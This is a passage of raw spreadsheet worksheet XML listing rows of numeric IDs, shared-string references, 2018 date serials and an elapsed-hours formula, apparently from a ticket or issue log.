      <c r="C1303" t="s">
        <v>3609</v>
      </c>
      <c r="D1303" t="s">
        <v>7</v>
      </c>
      <c r="E1303" s="1">
        <v>43365.015497685185</v>
      </c>
      <c r="F1303" s="1">
        <v>43367.315729166665</v>
      </c>
      <c r="G1303" t="s">
        <v>55</v>
      </c>
      <c r="H1303" t="str">
        <f>TEXT(F1303-E1303,"[h]")</f>
        <v>55</v>
      </c>
    </row>
    <row r="1304" spans="1:8" hidden="1">
      <c r="A1304" t="s">
        <v>3610</v>
      </c>
      <c r="B1304">
        <v>12014</v>
      </c>
      <c r="C1304" t="s">
        <v>3611</v>
      </c>
      <c r="D1304" t="s">
        <v>7</v>
      </c>
      <c r="E1304" s="1">
        <v>43364.877939814818</v>
      </c>
      <c r="F1304" s="1">
        <v>43365.088483796295</v>
      </c>
      <c r="G1304" t="s">
        <v>333</v>
      </c>
      <c r="H1304" t="str">
        <f>TEXT(F1304-E1304,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1305" spans="1:8" hidden="1">
      <c r="A1305" t="s">
        <v>3612</v>
      </c>
      <c r="B1305">
        <v>12013</v>
      </c>
      <c r="C1305" t="s">
        <v>3613</v>
      </c>
      <c r="D1305" t="s">
        <v>7</v>
      </c>
      <c r="E1305" s="1">
        <v>43364.714050925926</v>
      </c>
      <c r="F1305" s="1">
        <v>43365.088483796295</v>
      </c>
      <c r="G1305" t="s">
        <v>333</v>
      </c>
      <c r="H1305" t="str">
        <f>TEXT(F1305-E1305,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1306" spans="1:8" hidden="1">
      <c r="A1306" t="s">
        <v>3614</v>
      </c>
      <c r="B1306">
        <v>12012</v>
      </c>
      <c r="C1306" t="s">
        <v>3615</v>
      </c>
      <c r="D1306" t="s">
        <v>7</v>
      </c>
      <c r="E1306" s="1">
        <v>43364.69258101852</v>
      </c>
      <c r="F1306" s="1">
        <v>43365.669236111113</v>
      </c>
      <c r="G1306" t="s">
        <v>28</v>
      </c>
      <c r="H1306" t="str">
        <f>TEXT(F1306-E1306,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="1307" spans="1:8" hidden="1">
      <c r="A1307" t="s">
        <v>3616</v>
      </c>
      <c r="B1307">
        <v>12011</v>
      </c>
      <c r="C1307" t="s">
        <v>3617</v>
      </c>
      <c r="D1307" t="s">
        <v>7</v>
      </c>
      <c r="E1307" s="1">
        <v>43364.643495370372</v>
      </c>
      <c r="F1307" s="1">
        <v>43383.856180555558</v>
      </c>
      <c r="G1307" t="s">
        <v>3618</v>
      </c>
      <c r="H1307" t="str">
        <f>TEXT(F1307-E1307,"[h]")</f>
        <v>461</v>
      </c>
    </row>
    <row r="1308" spans="1:8" hidden="1">
      <c r="A1308" t="s">
        <v>3619</v>
      </c>
      <c r="B1308">
        <v>12009</v>
      </c>
      <c r="C1308" t="s">
        <v>3620</v>
      </c>
      <c r="D1308" t="s">
        <v>7</v>
      </c>
      <c r="E1308" s="1">
        <v>43364.277939814812</v>
      </c>
      <c r="F1308" s="1">
        <v>43364.403182870374</v>
      </c>
      <c r="G1308" t="s">
        <v>28</v>
      </c>
      <c r="H1308" t="str">
        <f>TEXT(F1308-E1308,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1309" spans="1:8" hidden="1">
      <c r="A1309" t="s">
        <v>3621</v>
      </c>
      <c r="B1309">
        <v>12008</v>
      </c>
      <c r="C1309" t="s">
        <v>3622</v>
      </c>
      <c r="D1309" t="s">
        <v>7</v>
      </c>
      <c r="E1309" s="1">
        <v>43364.273333333331</v>
      </c>
      <c r="F1309" s="1">
        <v>43364.403611111113</v>
      </c>
      <c r="G1309" t="s">
        <v>28</v>
      </c>
      <c r="H1309" t="str">
        <f>TEXT(F1309-E1309,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1310" spans="1:8" hidden="1">
      <c r="A1310" t="s">
        <v>3623</v>
      </c>
      <c r="B1310">
        <v>12007</v>
      </c>
      <c r="C1310" t="s">
        <v>3624</v>
      </c>
      <c r="D1310" t="s">
        <v>7</v>
      </c>
      <c r="E1310" s="1">
        <v>43364.266736111109</v>
      </c>
      <c r="F1310" s="1">
        <v>43364.403182870374</v>
      </c>
      <c r="G1310" t="s">
        <v>28</v>
      </c>
      <c r="H1310" t="str">
        <f>TEXT(F1310-E1310,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1311" spans="1:8" hidden="1">
      <c r="A1311" t="s">
        <v>3625</v>
      </c>
      <c r="B1311">
        <v>12006</v>
      </c>
      <c r="C1311" t="s">
        <v>3626</v>
      </c>
      <c r="D1311" t="s">
        <v>7</v>
      </c>
      <c r="E1311" s="1">
        <v>43364.147604166668</v>
      </c>
      <c r="F1311" s="1">
        <v>43364.328969907408</v>
      </c>
      <c r="G1311" t="s">
        <v>118</v>
      </c>
      <c r="H1311" t="str">
        <f>TEXT(F1311-E1311,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1312" spans="1:8" hidden="1">
      <c r="A1312" t="s">
        <v>3627</v>
      </c>
      <c r="B1312">
        <v>12005</v>
      </c>
      <c r="C1312" t="s">
        <v>3628</v>
      </c>
      <c r="D1312" t="s">
        <v>7</v>
      </c>
      <c r="E1312" s="1">
        <v>43364.091331018521</v>
      </c>
      <c r="F1312" s="1">
        <v>43367.944907407407</v>
      </c>
      <c r="G1312" t="s">
        <v>3288</v>
      </c>
      <c r="H1312" t="str">
        <f>TEXT(F1312-E1312,"[h]")</f>
        <v>92</v>
      </c>
    </row>
    <row r="1313" spans="1:8" hidden="1">
      <c r="A1313" t="s">
        <v>3629</v>
      </c>
      <c r="B1313">
        <v>12004</v>
      </c>
      <c r="C1313" t="s">
        <v>3630</v>
      </c>
      <c r="D1313" t="s">
        <v>7</v>
      </c>
      <c r="E1313" s="1">
        <v>43364.057256944441</v>
      </c>
      <c r="F1313" s="1">
        <v>43365.044710648152</v>
      </c>
      <c r="G1313" t="s">
        <v>2909</v>
      </c>
      <c r="H1313" t="str">
        <f>TEXT(F1313-E1313,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="1314" spans="1:8" hidden="1">
      <c r="A1314" t="s">
        <v>3631</v>
      </c>
      <c r="B1314">
        <v>12002</v>
      </c>
      <c r="C1314" t="s">
        <v>3632</v>
      </c>
      <c r="D1314" t="s">
        <v>7</v>
      </c>
      <c r="E1314" s="1">
        <v>43363.779652777775</v>
      </c>
      <c r="F1314" s="1">
        <v>43363.876539351855</v>
      </c>
      <c r="G1314" t="s">
        <v>831</v>
      </c>
      <c r="H1314" t="str">
        <f>TEXT(F1314-E1314,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1315" spans="1:8" hidden="1">
      <c r="A1315" t="s">
        <v>3633</v>
      </c>
      <c r="B1315">
        <v>12001</v>
      </c>
      <c r="C1315" t="s">
        <v>3634</v>
      </c>
      <c r="D1315" t="s">
        <v>7</v>
      </c>
      <c r="E1315" s="1">
        <v>43363.723900462966</v>
      </c>
      <c r="F1315" s="1">
        <v>43374.774953703702</v>
      </c>
      <c r="G1315" t="s">
        <v>3635</v>
      </c>
      <c r="H1315" t="str">
        <f>TEXT(F1315-E1315,"[h]")</f>
        <v>265</v>
      </c>
    </row>
    <row r="1316" spans="1:8" hidden="1">
      <c r="A1316" t="s">
        <v>3636</v>
      </c>
      <c r="B1316">
        <v>12000</v>
      </c>
      <c r="C1316" t="s">
        <v>3637</v>
      </c>
      <c r="D1316" t="s">
        <v>7</v>
      </c>
      <c r="E1316" s="1">
        <v>43363.71466435185</v>
      </c>
      <c r="F1316" s="1">
        <v>43363.760289351849</v>
      </c>
      <c r="G1316" t="s">
        <v>1103</v>
      </c>
      <c r="H1316" t="str">
        <f>TEXT(F1316-E1316,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1317" spans="1:8" hidden="1">
      <c r="A1317" t="s">
        <v>3638</v>
      </c>
      <c r="B1317">
        <v>11997</v>
      </c>
      <c r="C1317" t="s">
        <v>3639</v>
      </c>
      <c r="D1317" t="s">
        <v>7</v>
      </c>
      <c r="E1317" s="1">
        <v>43363.29787037037</v>
      </c>
      <c r="F1317" s="1">
        <v>43363.668854166666</v>
      </c>
      <c r="G1317" t="s">
        <v>174</v>
      </c>
      <c r="H1317" t="str">
        <f>TEXT(F1317-E1317,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1318" spans="1:8" hidden="1">
      <c r="A1318" t="s">
        <v>3640</v>
      </c>
      <c r="B1318">
        <v>11996</v>
      </c>
      <c r="C1318" t="s">
        <v>3641</v>
      </c>
      <c r="D1318" t="s">
        <v>7</v>
      </c>
      <c r="E1318" s="1">
        <v>43363.261840277781</v>
      </c>
      <c r="F1318" s="1">
        <v>43363.646631944444</v>
      </c>
      <c r="G1318" t="s">
        <v>55</v>
      </c>
      <c r="H1318" t="str">
        <f>TEXT(F1318-E1318,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1319" spans="1:8" hidden="1">
      <c r="A1319" t="s">
        <v>3642</v>
      </c>
      <c r="B1319">
        <v>11995</v>
      </c>
      <c r="C1319" t="s">
        <v>3643</v>
      </c>
      <c r="D1319" t="s">
        <v>7</v>
      </c>
      <c r="E1319" s="1">
        <v>43363.195324074077</v>
      </c>
      <c r="F1319" s="1">
        <v>43363.66028935185</v>
      </c>
      <c r="G1319" t="s">
        <v>1358</v>
      </c>
      <c r="H1319" t="str">
        <f>TEXT(F1319-E1319,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1320" spans="1:8" hidden="1">
      <c r="A1320" t="s">
        <v>3644</v>
      </c>
      <c r="B1320">
        <v>11994</v>
      </c>
      <c r="C1320" t="s">
        <v>3645</v>
      </c>
      <c r="D1320" t="s">
        <v>7</v>
      </c>
      <c r="E1320" s="1">
        <v>43363.088900462964</v>
      </c>
      <c r="F1320" s="1">
        <v>43363.685532407406</v>
      </c>
      <c r="G1320" t="s">
        <v>1103</v>
      </c>
      <c r="H1320" t="str">
        <f>TEXT(F1320-E1320,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1321" spans="1:8" hidden="1">
      <c r="A1321" t="s">
        <v>3648</v>
      </c>
      <c r="B1321">
        <v>11991</v>
      </c>
      <c r="C1321" t="s">
        <v>3649</v>
      </c>
      <c r="D1321" t="s">
        <v>7</v>
      </c>
      <c r="E1321" s="1">
        <v>43362.619247685187</v>
      </c>
      <c r="F1321" s="1">
        <v>43374.766597222224</v>
      </c>
      <c r="G1321" t="s">
        <v>28</v>
      </c>
      <c r="H1321" t="str">
        <f>TEXT(F1321-E1321,"[h]")</f>
        <v>291</v>
      </c>
    </row>
    <row r="1322" spans="1:8">
      <c r="A1322" t="s">
        <v>3646</v>
      </c>
      <c r="B1322">
        <v>11989</v>
      </c>
      <c r="C1322" t="s">
        <v>3647</v>
      </c>
      <c r="D1322" t="s">
        <v>7</v>
      </c>
      <c r="E1322" s="1">
        <v>43362.575636574074</v>
      </c>
      <c r="F1322" s="1">
        <v>43362.639791666668</v>
      </c>
      <c r="G1322" t="s">
        <v>19</v>
      </c>
      <c r="H1322" t="str">
        <f>TEXT(F1322-E1322,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1323" spans="1:8">
      <c r="A1323" t="s">
        <v>3652</v>
      </c>
      <c r="B1323">
        <v>11986</v>
      </c>
      <c r="C1323" t="s">
        <v>3653</v>
      </c>
      <c r="D1323" t="s">
        <v>7</v>
      </c>
      <c r="E1323" s="1">
        <v>43362.13175925926</v>
      </c>
      <c r="F1323" s="1">
        <v>43362.60083333333</v>
      </c>
      <c r="G1323" t="s">
        <v>1378</v>
      </c>
      <c r="H1323" t="str">
        <f>TEXT(F1323-E1323,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1324" spans="1:8" hidden="1">
      <c r="B1324">
        <v>11984</v>
      </c>
      <c r="C1324" t="s">
        <v>3656</v>
      </c>
      <c r="D1324" t="s">
        <v>7</v>
      </c>
      <c r="E1324" s="1">
        <v>43362.116041666668</v>
      </c>
      <c r="F1324" s="1">
        <v>43376.839953703704</v>
      </c>
      <c r="G1324" t="s">
        <v>55</v>
      </c>
      <c r="H1324" t="str">
        <f>TEXT(F1324-E1324,"[h]")</f>
        <v>353</v>
      </c>
    </row>
    <row r="1325" spans="1:8">
      <c r="A1325" t="s">
        <v>3657</v>
      </c>
      <c r="B1325">
        <v>11983</v>
      </c>
      <c r="C1325" t="s">
        <v>3658</v>
      </c>
      <c r="D1325" t="s">
        <v>7</v>
      </c>
      <c r="E1325" s="1">
        <v>43362.038819444446</v>
      </c>
      <c r="F1325" s="1">
        <v>43362.639791666668</v>
      </c>
      <c r="G1325" t="s">
        <v>16</v>
      </c>
      <c r="H1325" t="str">
        <f>TEXT(F1325-E1325,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1326" spans="1:8">
      <c r="A1326" t="s">
        <v>3659</v>
      </c>
      <c r="B1326">
        <v>11981</v>
      </c>
      <c r="C1326" t="s">
        <v>3660</v>
      </c>
      <c r="D1326" t="s">
        <v>7</v>
      </c>
      <c r="E1326" s="1">
        <v>43361.820983796293</v>
      </c>
      <c r="F1326" s="1">
        <v>43362.05064814815</v>
      </c>
      <c r="G1326" t="s">
        <v>713</v>
      </c>
      <c r="H1326" t="str">
        <f>TEXT(F1326-E1326,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1327" spans="1:8" hidden="1">
      <c r="A1327" t="s">
        <v>3661</v>
      </c>
      <c r="B1327">
        <v>11980</v>
      </c>
      <c r="C1327" t="s">
        <v>3662</v>
      </c>
      <c r="D1327" t="s">
        <v>7</v>
      </c>
      <c r="E1327" s="1">
        <v>43361.73636574074</v>
      </c>
      <c r="F1327" s="1">
        <v>43537.906921296293</v>
      </c>
      <c r="G1327" t="s">
        <v>1302</v>
      </c>
      <c r="H1327" t="str">
        <f>TEXT(F1327-E1327,"[h]")</f>
        <v>4228</v>
      </c>
    </row>
    <row r="1328" spans="1:8" hidden="1">
      <c r="A1328" t="s">
        <v>3663</v>
      </c>
      <c r="B1328">
        <v>11979</v>
      </c>
      <c r="C1328" t="s">
        <v>3664</v>
      </c>
      <c r="D1328" t="s">
        <v>7</v>
      </c>
      <c r="E1328" s="1">
        <v>43361.700567129628</v>
      </c>
      <c r="F1328" s="1">
        <v>43382.438425925924</v>
      </c>
      <c r="G1328" t="s">
        <v>174</v>
      </c>
      <c r="H1328" t="str">
        <f>TEXT(F1328-E1328,"[h]")</f>
        <v>497</v>
      </c>
    </row>
    <row r="1329" spans="1:8" hidden="1">
      <c r="A1329" t="s">
        <v>1772</v>
      </c>
      <c r="B1329">
        <v>11978</v>
      </c>
      <c r="C1329" t="s">
        <v>3665</v>
      </c>
      <c r="D1329" t="s">
        <v>7</v>
      </c>
      <c r="E1329" s="1">
        <v>43361.435486111113</v>
      </c>
      <c r="F1329" s="1">
        <v>43361.656701388885</v>
      </c>
      <c r="G1329" t="s">
        <v>251</v>
      </c>
      <c r="H1329" t="str">
        <f>TEXT(F1329-E1329,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1330" spans="1:8">
      <c r="A1330" t="s">
        <v>3666</v>
      </c>
      <c r="B1330">
        <v>11977</v>
      </c>
      <c r="C1330" t="s">
        <v>3667</v>
      </c>
      <c r="D1330" t="s">
        <v>7</v>
      </c>
      <c r="E1330" s="1">
        <v>43361.321793981479</v>
      </c>
      <c r="F1330" s="1">
        <v>43474.602893518517</v>
      </c>
      <c r="G1330" t="s">
        <v>1669</v>
      </c>
      <c r="H1330" t="str">
        <f>TEXT(F1330-E1330,"[h]")</f>
        <v>2718</v>
      </c>
    </row>
    <row r="1331" spans="1:8" hidden="1">
      <c r="A1331" t="s">
        <v>3668</v>
      </c>
      <c r="B1331">
        <v>11976</v>
      </c>
      <c r="C1331" t="s">
        <v>3669</v>
      </c>
      <c r="D1331" t="s">
        <v>7</v>
      </c>
      <c r="E1331" s="1">
        <v>43361.175023148149</v>
      </c>
      <c r="F1331" s="1">
        <v>43361.749120370368</v>
      </c>
      <c r="G1331" t="s">
        <v>368</v>
      </c>
      <c r="H1331" t="str">
        <f>TEXT(F1331-E1331,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="1332" spans="1:8">
      <c r="A1332" t="s">
        <v>3670</v>
      </c>
      <c r="B1332">
        <v>11975</v>
      </c>
      <c r="C1332" t="s">
        <v>3671</v>
      </c>
      <c r="D1332" t="s">
        <v>7</v>
      </c>
      <c r="E1332" s="1">
        <v>43360.901400462964</v>
      </c>
      <c r="F1332" s="1">
        <v>43383.015300925923</v>
      </c>
      <c r="G1332" t="s">
        <v>189</v>
      </c>
      <c r="H1332" t="str">
        <f>TEXT(F1332-E1332,"[h]")</f>
        <v>530</v>
      </c>
    </row>
    <row r="1333" spans="1:8">
      <c r="A1333" t="s">
        <v>3672</v>
      </c>
      <c r="B1333">
        <v>11974</v>
      </c>
      <c r="C1333" t="s">
        <v>3673</v>
      </c>
      <c r="D1333" t="s">
        <v>7</v>
      </c>
      <c r="E1333" s="1">
        <v>43360.854108796295</v>
      </c>
      <c r="F1333" s="1">
        <v>43361.080648148149</v>
      </c>
      <c r="G1333" t="s">
        <v>3674</v>
      </c>
      <c r="H1333" t="str">
        <f>TEXT(F1333-E1333,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1334" spans="1:8">
      <c r="A1334" t="s">
        <v>3654</v>
      </c>
      <c r="B1334">
        <v>11973</v>
      </c>
      <c r="C1334" t="s">
        <v>3655</v>
      </c>
      <c r="D1334" t="s">
        <v>7</v>
      </c>
      <c r="E1334" s="1">
        <v>43360.721412037034</v>
      </c>
      <c r="F1334" s="1">
        <v>43361.815983796296</v>
      </c>
      <c r="G1334" t="s">
        <v>19</v>
      </c>
      <c r="H1334" t="str">
        <f>TEXT(F1334-E1334,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="1335" spans="1:8" hidden="1">
      <c r="A1335" t="s">
        <v>3675</v>
      </c>
      <c r="B1335">
        <v>11971</v>
      </c>
      <c r="C1335" t="s">
        <v>3676</v>
      </c>
      <c r="D1335" t="s">
        <v>7</v>
      </c>
      <c r="E1335" s="1">
        <v>43360.242037037038</v>
      </c>
      <c r="F1335" s="1">
        <v>43397.141747685186</v>
      </c>
      <c r="G1335" t="s">
        <v>28</v>
      </c>
      <c r="H1335" t="str">
        <f>TEXT(F1335-E1335,"[h]")</f>
        <v>885</v>
      </c>
    </row>
    <row r="1336" spans="1:8">
      <c r="A1336" t="s">
        <v>3677</v>
      </c>
      <c r="B1336">
        <v>11969</v>
      </c>
      <c r="C1336" t="s">
        <v>3678</v>
      </c>
      <c r="D1336" t="s">
        <v>7</v>
      </c>
      <c r="E1336" s="1">
        <v>43359.858391203707</v>
      </c>
      <c r="F1336" s="1">
        <v>43479.738657407404</v>
      </c>
      <c r="G1336" t="s">
        <v>16</v>
      </c>
      <c r="H1336" t="str">
        <f>TEXT(F1336-E1336,"[h]")</f>
        <v>2877</v>
      </c>
    </row>
    <row r="1337" spans="1:8">
      <c r="A1337" t="s">
        <v>3650</v>
      </c>
      <c r="B1337">
        <v>11967</v>
      </c>
      <c r="C1337" t="s">
        <v>3651</v>
      </c>
      <c r="D1337" t="s">
        <v>7</v>
      </c>
      <c r="E1337" s="1">
        <v>43359.834305555552</v>
      </c>
      <c r="F1337" s="1">
        <v>43359.958009259259</v>
      </c>
      <c r="G1337" t="s">
        <v>16</v>
      </c>
      <c r="H1337" t="str">
        <f>TEXT(F1337-E1337,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1338" spans="1:8" hidden="1">
      <c r="A1338" t="s">
        <v>3679</v>
      </c>
      <c r="B1338">
        <v>11966</v>
      </c>
      <c r="C1338" t="s">
        <v>3680</v>
      </c>
      <c r="D1338" t="s">
        <v>7</v>
      </c>
      <c r="E1338" s="1">
        <v>43359.794166666667</v>
      </c>
      <c r="F1338" s="1">
        <v>43419.932939814818</v>
      </c>
      <c r="G1338" t="s">
        <v>43</v>
      </c>
      <c r="H1338" t="str">
        <f>TEXT(F1338-E1338,"[h]")</f>
        <v>1443</v>
      </c>
    </row>
    <row r="1339" spans="1:8" hidden="1">
      <c r="A1339" t="s">
        <v>3681</v>
      </c>
      <c r="B1339">
        <v>11965</v>
      </c>
      <c r="C1339" t="s">
        <v>3682</v>
      </c>
      <c r="D1339" t="s">
        <v>7</v>
      </c>
      <c r="E1339" s="1">
        <v>43359.753310185188</v>
      </c>
      <c r="F1339" s="1">
        <v>43392.366273148145</v>
      </c>
      <c r="G1339" t="s">
        <v>3683</v>
      </c>
      <c r="H1339" t="str">
        <f>TEXT(F1339-E1339,"[h]")</f>
        <v>782</v>
      </c>
    </row>
    <row r="1340" spans="1:8" hidden="1">
      <c r="A1340" t="s">
        <v>3684</v>
      </c>
      <c r="B1340">
        <v>11962</v>
      </c>
      <c r="C1340" t="s">
        <v>3685</v>
      </c>
      <c r="D1340" t="s">
        <v>7</v>
      </c>
      <c r="E1340" s="1">
        <v>43359.438831018517</v>
      </c>
      <c r="F1340" s="1">
        <v>43373.699224537035</v>
      </c>
      <c r="G1340" t="s">
        <v>2100</v>
      </c>
      <c r="H1340" t="str">
        <f>TEXT(F1340-E1340,"[h]")</f>
        <v>342</v>
      </c>
    </row>
    <row r="1341" spans="1:8" hidden="1">
      <c r="A1341" t="s">
        <v>3686</v>
      </c>
      <c r="B1341">
        <v>11961</v>
      </c>
      <c r="C1341" t="s">
        <v>3687</v>
      </c>
      <c r="D1341" t="s">
        <v>7</v>
      </c>
      <c r="E1341" s="1">
        <v>43359.2266087963</v>
      </c>
      <c r="F1341" s="1">
        <v>43361.819606481484</v>
      </c>
      <c r="G1341" t="s">
        <v>2631</v>
      </c>
      <c r="H1341" t="str">
        <f>TEXT(F1341-E1341,"[h]")</f>
        <v>62</v>
      </c>
    </row>
    <row r="1342" spans="1:8" hidden="1">
      <c r="A1342" t="s">
        <v>3688</v>
      </c>
      <c r="B1342">
        <v>11959</v>
      </c>
      <c r="C1342" t="s">
        <v>3689</v>
      </c>
      <c r="D1342" t="s">
        <v>7</v>
      </c>
      <c r="E1342" s="1">
        <v>43358.827928240738</v>
      </c>
      <c r="F1342" s="1">
        <v>43365.656157407408</v>
      </c>
      <c r="G1342" t="s">
        <v>3690</v>
      </c>
      <c r="H1342" t="str">
        <f>TEXT(F1342-E1342,"[h]")</f>
        <v>163</v>
      </c>
    </row>
    <row r="1343" spans="1:8" hidden="1">
      <c r="A1343" t="s">
        <v>3691</v>
      </c>
      <c r="B1343">
        <v>11957</v>
      </c>
      <c r="C1343" t="s">
        <v>3692</v>
      </c>
      <c r="D1343" t="s">
        <v>7</v>
      </c>
      <c r="E1343" s="1">
        <v>43358.388379629629</v>
      </c>
      <c r="F1343" s="1">
        <v>43365.659270833334</v>
      </c>
      <c r="G1343" t="s">
        <v>37</v>
      </c>
      <c r="H1343" t="str">
        <f>TEXT(F1343-E1343,"[h]")</f>
        <v>174</v>
      </c>
    </row>
    <row r="1344" spans="1:8" hidden="1">
      <c r="A1344" t="s">
        <v>3693</v>
      </c>
      <c r="B1344">
        <v>11955</v>
      </c>
      <c r="C1344" t="s">
        <v>3694</v>
      </c>
      <c r="D1344" t="s">
        <v>7</v>
      </c>
      <c r="E1344" s="1">
        <v>43358.139004629629</v>
      </c>
      <c r="F1344" s="1">
        <v>43596.724050925928</v>
      </c>
      <c r="G1344" t="s">
        <v>3695</v>
      </c>
      <c r="H1344" t="str">
        <f>TEXT(F1344-E1344,"[h]")</f>
        <v>5726</v>
      </c>
    </row>
    <row r="1345" spans="1:8" hidden="1">
      <c r="A1345" t="s">
        <v>3696</v>
      </c>
      <c r="B1345">
        <v>11954</v>
      </c>
      <c r="C1345" t="s">
        <v>3697</v>
      </c>
      <c r="D1345" t="s">
        <v>7</v>
      </c>
      <c r="E1345" s="1">
        <v>43357.864965277775</v>
      </c>
      <c r="F1345" s="1">
        <v>43358.710173611114</v>
      </c>
      <c r="G1345" t="s">
        <v>43</v>
      </c>
      <c r="H1345" t="str">
        <f>TEXT(F1345-E1345,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1346" spans="1:8" hidden="1">
      <c r="A1346" t="s">
        <v>3698</v>
      </c>
      <c r="B1346">
        <v>11953</v>
      </c>
      <c r="C1346" t="s">
        <v>3699</v>
      </c>
      <c r="D1346" t="s">
        <v>7</v>
      </c>
      <c r="E1346" s="1">
        <v>43357.758287037039</v>
      </c>
      <c r="F1346" s="1">
        <v>43358.551655092589</v>
      </c>
      <c r="G1346" t="s">
        <v>55</v>
      </c>
      <c r="H1346" t="str">
        <f>TEXT(F1346-E1346,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="1347" spans="1:8" hidden="1">
      <c r="A1347" t="s">
        <v>3700</v>
      </c>
      <c r="B1347">
        <v>11952</v>
      </c>
      <c r="C1347" t="s">
        <v>3701</v>
      </c>
      <c r="D1347" t="s">
        <v>7</v>
      </c>
      <c r="E1347" s="1">
        <v>43357.694108796299</v>
      </c>
      <c r="F1347" s="1">
        <v>43357.752881944441</v>
      </c>
      <c r="G1347" t="s">
        <v>28</v>
      </c>
      <c r="H1347" t="str">
        <f>TEXT(F1347-E1347,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1348" spans="1:8" hidden="1">
      <c r="A1348" t="s">
        <v>3702</v>
      </c>
      <c r="B1348">
        <v>11950</v>
      </c>
      <c r="C1348" t="s">
        <v>3703</v>
      </c>
      <c r="D1348" t="s">
        <v>7</v>
      </c>
      <c r="E1348" s="1">
        <v>43357.294988425929</v>
      </c>
      <c r="F1348" s="1">
        <v>43357.577916666669</v>
      </c>
      <c r="G1348" t="s">
        <v>852</v>
      </c>
      <c r="H1348" t="str">
        <f>TEXT(F1348-E1348,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1349" spans="1:8" hidden="1">
      <c r="A1349" t="s">
        <v>3704</v>
      </c>
      <c r="B1349">
        <v>11949</v>
      </c>
      <c r="C1349" t="s">
        <v>3705</v>
      </c>
      <c r="D1349" t="s">
        <v>7</v>
      </c>
      <c r="E1349" s="1">
        <v>43357.257407407407</v>
      </c>
      <c r="F1349" s="1">
        <v>43357.57366898148</v>
      </c>
      <c r="G1349" t="s">
        <v>28</v>
      </c>
      <c r="H1349" t="str">
        <f>TEXT(F1349-E1349,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1350" spans="1:8" hidden="1">
      <c r="A1350" t="s">
        <v>3706</v>
      </c>
      <c r="B1350">
        <v>11948</v>
      </c>
      <c r="C1350" t="s">
        <v>3707</v>
      </c>
      <c r="D1350" t="s">
        <v>7</v>
      </c>
      <c r="E1350" s="1">
        <v>43357.042581018519</v>
      </c>
      <c r="F1350" s="1">
        <v>43357.697685185187</v>
      </c>
      <c r="G1350" t="s">
        <v>1289</v>
      </c>
      <c r="H1350" t="str">
        <f>TEXT(F1350-E1350,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1351" spans="1:8" hidden="1">
      <c r="A1351" t="s">
        <v>3708</v>
      </c>
      <c r="B1351">
        <v>11947</v>
      </c>
      <c r="C1351" t="s">
        <v>3709</v>
      </c>
      <c r="D1351" t="s">
        <v>7</v>
      </c>
      <c r="E1351" s="1">
        <v>43357.013020833336</v>
      </c>
      <c r="F1351" s="1">
        <v>43358.551655092589</v>
      </c>
      <c r="G1351" t="s">
        <v>55</v>
      </c>
      <c r="H1351" t="str">
        <f>TEXT(F1351-E1351,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="1352" spans="1:8" hidden="1">
      <c r="A1352" t="s">
        <v>3710</v>
      </c>
      <c r="B1352">
        <v>11943</v>
      </c>
      <c r="C1352" t="s">
        <v>3711</v>
      </c>
      <c r="D1352" t="s">
        <v>7</v>
      </c>
      <c r="E1352" s="1">
        <v>43356.703368055554</v>
      </c>
      <c r="F1352" s="1">
        <v>43357.676898148151</v>
      </c>
      <c r="G1352" t="s">
        <v>1305</v>
      </c>
      <c r="H1352" t="str">
        <f>TEXT(F1352-E1352,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="1353" spans="1:8">
      <c r="A1353" t="s">
        <v>3712</v>
      </c>
      <c r="B1353">
        <v>11942</v>
      </c>
      <c r="C1353" t="s">
        <v>3713</v>
      </c>
      <c r="D1353" t="s">
        <v>7</v>
      </c>
      <c r="E1353" s="1">
        <v>43356.443680555552</v>
      </c>
      <c r="F1353" s="1">
        <v>43361.815983796296</v>
      </c>
      <c r="G1353" t="s">
        <v>3714</v>
      </c>
      <c r="H1353" t="str">
        <f>TEXT(F1353-E1353,"[h]")</f>
        <v>128</v>
      </c>
    </row>
    <row r="1354" spans="1:8">
      <c r="A1354" t="s">
        <v>3715</v>
      </c>
      <c r="B1354">
        <v>11941</v>
      </c>
      <c r="C1354" t="s">
        <v>3716</v>
      </c>
      <c r="D1354" t="s">
        <v>7</v>
      </c>
      <c r="E1354" s="1">
        <v>43356.040046296293</v>
      </c>
      <c r="F1354" s="1">
        <v>43365.653819444444</v>
      </c>
      <c r="G1354" t="s">
        <v>3717</v>
      </c>
      <c r="H1354" t="str">
        <f>TEXT(F1354-E1354,"[h]")</f>
        <v>230</v>
      </c>
    </row>
    <row r="1355" spans="1:8" hidden="1">
      <c r="A1355" t="s">
        <v>3718</v>
      </c>
      <c r="B1355">
        <v>11937</v>
      </c>
      <c r="C1355" t="s">
        <v>3719</v>
      </c>
      <c r="D1355" t="s">
        <v>7</v>
      </c>
      <c r="E1355" s="1">
        <v>43355.773495370369</v>
      </c>
